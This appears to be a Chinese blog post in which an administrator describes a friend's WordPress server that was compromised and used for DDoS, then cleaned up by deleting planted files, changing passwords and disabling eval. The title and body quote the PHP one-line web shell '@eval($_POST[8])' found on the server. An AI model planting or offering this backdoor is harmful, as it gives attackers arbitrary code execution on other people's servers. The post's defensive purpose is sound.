编程语言
首页 > 编程语言> > php @eval($_POST[8])?

php @eval($_POST[8])?

作者:互联网

周前,我账号下的几台服务器,有一台是朋友的,挂着他公司的网站,不知道,从月初开始,一直收到挂马的短信通知,更离谱的是成了肉鸡,流量异常,在远程DDoS别的机器,这万一让服务商吧服务器给处罚了......就不好了。开始我也没在乎,也许是被扫到了。但是成了肉鸡之后,我决定看一下。

        首先,他的网站用的是wordpress OS(最近漏洞消息不断,我昨天收到的邮件里,有一封是关于这个)

图片

图片

这里插一句,全球有27%左右的网站用的这个系统。

至于那台服务器是如何被***的,我看了一看服务器了的文件,有连个个.php文件:

图片
里面的代码就是我写的标题。图片
        这是传说中的一句话***。eval可以用来执行任何其他php代码,危险系数比较大。

        删掉这些文件,密码改掉,可能的漏洞已修补,完事(这几天没有收到信息,不过过几天怎么样,哈哈就不敢说了)。

        有的网站的站长,有些是不懂技术的,对上上边的这个eval函数,不用的话最好禁止一下。

下面是我找的禁止函数的方法。

图片
        有不少的站长,在维护自己的服务器的时候,托管方要找点靠谱点的,我说的这台服务器就是交给了第三方,我不敢说他们和黑产有多少联系,不过还是小心点好。


标签:网站,收到,eval,肉鸡,服务器,POST,php
来源: https://blog.51cto.com/15080014/2642056